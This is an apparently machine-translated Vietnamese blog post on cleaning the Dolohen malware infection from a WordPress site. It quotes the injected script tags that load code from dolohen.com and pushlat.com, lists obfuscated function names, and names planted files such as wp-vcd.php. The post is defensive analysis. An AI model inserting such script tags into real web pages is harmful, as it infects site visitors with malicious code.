Xóa bỏ Dolohen trong web WordPress bị Malware

Trong khi gần đây duy trì một trang web wordpress cho một khách hàng, tôi đã bắt gặp một đoạn mã kỳ lạ khiến tôi chú ý:

<script type="text/javascript" src="https://dolohen.com/apu.php?zoneid=2285981">
<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2239327"></script>
<script src="//pushlat.com/ntfc.php?p=2239332" data-cfasync="false" async></script>

Tôi đã có thể xem tập lệnh được tham chiếu này thông qua trình thu thập dữ liệu web cá nhân của mình: Kraken

Công cụ này chưa có sẵn cho công chúng vì tôi đang hoàn thiện một vài chạm nhưng đây là một phần của báo cáo được tạo:

Dưới đây là một số tên miền được thêm ngẫu nhiên vào các trang:

  • https://perf.cdnads.com/
  • https://dolohen.com/

Những liên kết đặc biệt là cá heo đã đưa tôi đến một số mã Javascript thú vị và nhận ra rằng một số mã có thể nguy hiểm.

 

Tổng quan về Dolohen

Đây là một pastebin của mã được định dạng được phục hồi từ miền dolohen:

https://pastebin.com/FMMbqhxk

Tôi nhận thấy khá nhanh rằng các chuỗi đầu tiên được đặt trong biến a đã được mã hóa trong base64 . Chạy một vòng lặp nhỏ, tôi đã đảo ngược các chuỗi và như bạn có thể thấy trong danh sách trong pastebin này:

https://pastebin.com/h43WqBkc

Chúng ta có thể thấy ở đây một vài chuỗi khiến chúng ta tự hỏi javascript này đang làm gì chính xác:

  • forcedPerfomanceCall
  • connectStart
  • tryToEscapeIframe
  • secureScriptInject
  • trackWindow

Đây chỉ là một vài ví dụ về các từ khóa được tìm thấy trong chuỗi đảo ngược. Điều này đủ để báo động cho tôi rằng javascript này có thể được tạo ra với mục đích xấu. Điều này đã được tăng cường mạnh mẽ bởi thực tế là toàn bộ mã javascript đã bị xáo trộn.

Trở lại nhiễm trùng

Biết khá rõ các chức năng của hệ sinh thái wordpress tôi bắt đầu thấy những gì có thể đã thay đổi trong các tập tin. Tôi đã chạy lệnh sau:

find . -type f -mtime -10

Vì vậy, tôi có thể thấy tất cả các tệp được tạo trong pas 10 ngày. Tôi nhận thấy rằng một vài tệp đã được thêm vào thư mục wp-includes folder.

  • wp-includes/wp-tmp.php
  • wp-includes/wp-vcd.php
  • wp-includes/class.wp.php

Nhìn vào mã trong các tệp đó tôi nhận thấy rất nhiều mã đang gọi các url bên ngoài hoặc cố gắng tiêm dữ liệu vào cơ sở dữ liệu.

Lúc này tôi mới biết trang web đã bị xâm phạm. Tôi đã chạy quét plugin và phát hiện hai plugin có hại cho trang web

admin